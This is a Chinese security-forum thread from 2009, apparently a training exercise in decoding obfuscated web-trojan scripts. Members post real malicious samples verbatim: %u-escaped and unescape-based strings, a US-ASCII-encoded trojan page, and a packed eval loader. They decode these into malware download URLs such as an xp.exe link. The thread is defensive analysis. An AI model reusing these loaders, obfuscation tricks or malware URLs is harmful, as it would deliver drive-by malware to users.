瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密中级篇知识点巩固(考核)5.20号更新

12   1  /  2  页   跳转

网马解密中级篇知识点巩固(考核)5.20号更新

网马解密中级篇知识点巩固(考核)5.20号更新

卡卡讲堂之网马解密 初级篇
卡卡讲堂之网马解密 中级篇
卡卡讲堂之网马解密 高级篇(swf网马解密)
卡卡讲堂之网马解密 高级篇(pdf网马解密)
1.Freshow解密工具的详细用法
2.网马解密之——Eval篇
3.网马解密之——Document.write篇
4.网马解密之——Alpha2篇
5.网马解密之——Shellcode篇
6.网马解密之——Base64篇
7.网马解密之——US-ASCII篇
8.浅谈eval解密之——工具篇



引用:
1. http://4t6nhh.6600.org/a/do.css 这个恶意网址是以什么形式加密的,请使用freshow工具解出具体网马地址

  源代码:

GGshen6="%u7468%u7074%u2f3a%u352f%u326c%u386f%u632e%u6d6f%u772f%u6265%u782f%u2e70%u7865%u0065";






引用:
2. http://4t6nhh.6600.org/a/Turl.js 请使用freshow工具解出具体网马地址(最好能写出详细步骤)

  源代码:

document.writeln("<script language=\"JavaScript\">");

document.writeln("ShengFeng = unescape(\"YT7468YT7074YT2F3AYT352FYT326CYT386FYT632EYT6D6FYT772FYT6265YT782FYT2E70YT7865YT0065YT0000\");");document.writeln("<\/script>");








引用:
注:请将解密出的恶意网址以禁用url的形式发帖。


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
最后编辑networkedition 最后编辑于 2009-05-21 14:51:46
分享到:
gototop
 

回复 1F networkedition 的帖子

http://5l2o8.com/web/xp.exe
本帖被评分 1 次
gototop
 

回复: 网马解密中级篇知识点巩固(考核)5.19号更新

请说出下例恶意网址是以什么方式加密,并将其网马解出。

  http://www.kcrlsb.com/wbTextBox/wob/14.htm

  恶意网址 源代码内容如下:

<hTmL><HeAd><mETA hTtp-EQuIv="Content-Type" contEnT="text/html; charset=US-ASCII" /><tItLe>QQ:50071705 - by:laodIng</tiTLE></heAd><boDY>崐碱矬泸轲艟爫娂殒蜥礤狊蜚姜炯骝犴寰爫娂矬泸轲艟崐俭泸轲魻灬铉踽珏舰梳鲠鱼蜷痿⒕崐肌崐滹沲礤铘蜷翦祛á俭泸轲艟鲠驙衢扉犷癖吹抖犯会殪獒罱堍梏麴函鼢泸祗猱泔懑麾藻嘛黠獐氨钞屮遘⒒窀捣狈贡菇堍睐窀捣狈贡巩屮遘⒒趄鲠驙徜锝ㄤ镢蹴孱舢泸遽翦澎屙孱舁堍镡赍泗堍┅祸狎犱奖会滹弭留趄殁豸濞堍沆狍箝滠堍沆箝浜履苟玫刀盗抄北陌赋镰鞍冒雌貌古扯堍┗鲠驙褰被鲠驙旖徜锂抿遽翦镶赍泗ㄜ⑼殂蝻箫骠吞仍孕堍④ⅸ祸狎犳奖祸狎犾罱堍龄镘⒒鲠驙禚罱堍溻糗⒒鲠驙犷杰Ⅱ遽碥⒒鲠驙缃被鲠驙狍结滹蝈狒屣怅邈舁祛瞵堍堍┗鲠驙杞被飚橡孱ㄜ⑶旁堍殪獒瞵癌圾盱孱洙┗狍褰被鲠驙罱被狍疱瞑┗狍蜷翦盱弩痫铙迓镤会螽筢鲥麸骈戾傅繁饭惫┗狍祜箦ī祸狎狊桢祆结滹蝈狒屣怅邈舁堍予屐飚琉痨殂狒轱钴堍堍┗箬屐飚予屐戾沲翦傅繁饭惫④堍堍疱钴癌积汜翥瑷濠患泸轲糗劲┗崐緧娂泸轲艟崐俭泸轲魻豉疱舰翦筱蜷痿⒕骢钽糸镱犻铋舁麪滹沲礤铘蜷翦áⅸ积鏖钿秣铎镝錉綘轭轸患泸轲艟崐€</BoDy></hTmL>


gototop
 

回复:网马解密中级篇知识点巩固(考核)5.19号更新

US-ASCII加密特征
http://www.kcrlsb.com/wbTextBox/wob/013.exe
本帖被评分 1 次
╭∩╮(︶︿︶)╭∩╮
gototop
 

回复: 网马解密中级篇知识点巩固(考核)5.19号更新

Malzilla

解第二题

gototop
 

回复: 网马解密中级篇知识点巩固(考核)5.20号更新

一个迷惑人的eval加密,恶意网址地址:http://kuaile4444.3322.org/a/ggvod.js,大家尝试来解一下。

window.onerror=function(){return true;}
if(document.cookie.indexOf("YTloveSF=")==-1)
{

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="YTloveSF=Yes;path=/;expires="+expires.toGMTString();
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('28 G;H = 29[\'27\']("%1P"+"E" +"%1P"+"E%1r"+"W%1F"+"D%1K"+"J%1k"+"x" +"%14"+"z%1s"+"10%1G"+"D%14"+"5%1j"+"10" +"%1p"+"N%1R"+"h%1Z"+"b%1b"+"d%1c"+"K" +"%1l"+"7%1E"+"Z%1V"+"3%19"+"O%1Y"+"1" +"%23"+"g%1m"+"Y%1F"+"T%1u"+"U%1u"+"D" +"%14"+"6%1x"+"S%18"+"D%1M"+"i%1e"+"q" +"%20"+"1%15"+"D%14"+"D%1W"+"M%1D"+"y" +"%1z"+"t%1A"+"u%1w"+"9%1y"+"t%1o"+"0" +"%1t"+"e%1h"+"o%1H"+"s%13"+"s%1U"+"b" +"%14"+"r%1i"+"g%18"+"z%1n"+"D%1M"+"4" +"%1e"+"v%1M"+"I%16"+"g%17"+"W%1n"+"D" +"%1N"+"c%1I"+"g%1n"+"D%1Q"+"f%1O"+"L" +"%1a"+"j%22"+"X%26"+"B%26"+"12%24"+"A" +"%1L"+"2%1f"+"8%26"+"f%1Q"+"P%1T"+"k" +"%1d"+"d%1C"+"a%1B"+"V%26"+"12%1M"+"12" +"%1f"+"n%1N"+"11%1S"+"l%1Z"+"b%1q"+"m" +"%23"+"l%1q"+"6%1X"+"12%1T"+"p%25"+"F" +"%1a"+"C%1q"+"V%26"+"12%1L"+"12%15"+"X" +"%1g"+"A%1v"+"6%1X"+"12%1J"+"L%21"+"R" +"%22"+"w%26"+"g%26"+"12%26"+"l%22"+"P" +"%26"+"Q%26"+"12");',62,134,'00|03|04|08|0c|20|24|28|2c|2e|2f|33|34|36|3a|3c|40|41|4b|4e|50|52|53|54|55|5d|5e|64|65|6c|6f|70|73|74|75|78|83|84|8a|8b|90|98|YTdown|YTdown3|ad|b3c|be|bf|c5|c9|cb|d0|d7|d8|dd|df|e7|e8|eb|ec|ef|f2|f5|fc|ff|u00|u03|u04|u08|u09|u0c|u0d|u0e|u0f|u14|u1a|u1c|u24|u2c|u2e|u30|u33|u35|u38|u3b|u40|u43|u49|u53|u54|u56|u5c|u5e|u62|u64|u66|u6c|u6d|u6e|u6f|u70|u72|u74|u75|u76|u78|u7c|u7e|u8|u83|u8b|u8d|u8e|u90|u95|uad|uba|ubf|uc0|uc1|uc3|ud0|uda|udb|udd|ue2|ue8|ueb|uec|ufe|uff|unescape|var|window'.split('|'),0,{}))
var YTavpdown="%u7468%u7074%u2F3A%u352F%u326C%u386F%u632E%u6D6F%u772F%u6265%u782F%u2E70%u7865%u0065%u0000";
var YTdown=YTdown3+YTavpdown;
}


gototop
 

回复:网马解密中级篇知识点巩固(考核)5.20号更新

第二个可以利用freshow的replce功能(用%u替换YT)
最后利用shellcode解密
最后解密结果:hxxp://5l2o8.com/web/xp.exe
gototop
 

回复: 网马解密中级篇知识点巩固(考核)5.20号更新



引用:
原帖由 networkedition 于 2009-5-20 17:28:00 发表
一个迷惑人的eval加密,恶意网址地址:http://kuaile4444.3322.org/a/ggvod.js,大家尝试来解一下。[code]window.onerror=function(){return true;}
if(document.cookie.indexOf("YTloveSF=")==-1)
{

var expires=new Date();



gototop
 

回复: 网马解密中级篇知识点巩固(考核)5.20号更新



引用:
原帖由 networkedition 于 2009-5-20 17:28:00 发表
一个迷惑人的eval加密,恶意网址地址:http://kuaile4444.3322.org/a/ggvod.js,大家尝试来解一下。[code]window.onerror=function(){return true;}
if(document.cookie.indexOf("YTloveSF=")==-1)
{

var expires=new Date();


获取YTdown就可以了
最后编辑networkedition 最后编辑于 2009-05-22 15:17:30
gototop
 

回复: 网马解密中级篇知识点巩固(考核)5.20号更新



引用:
原帖由 networkedition 于 2009-5-20 17:28:00 发表
一个迷惑人的eval加密,恶意网址地址:http://kuaile4444.3322.org/a/ggvod.js,大家尝试来解一下。[code]window.onerror=function(){return true;}
if(document.cookie.indexOf("YTloveSF=")==-1)
{

var expires=new Date();


%u7468%u7074%u2F3A%u352F%u326C%u386F%u632E%u6D6F%u772F%u6265%u782F%u2E70%u7865%u0065%u0000

freshow中两次esc即可得到病毒的地址http://5l2o8.com/web/xp.exe
最后编辑networkedition 最后编辑于 2009-05-22 15:16:56
0.电脑安防交流群:79272952
1.下载windows清理助手,升级后清理系统。
  地址:http://download.arswp.com/arswp3/x86/arswp3_x86.zip
2.下载SREng,地址:http://download.kztechs.com/files/sreng2.zip
3.解压后运行SREngLdr.exe---智能扫描---扫描---保存报告。
4.将SREng.log日志文件压缩后上传。。
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT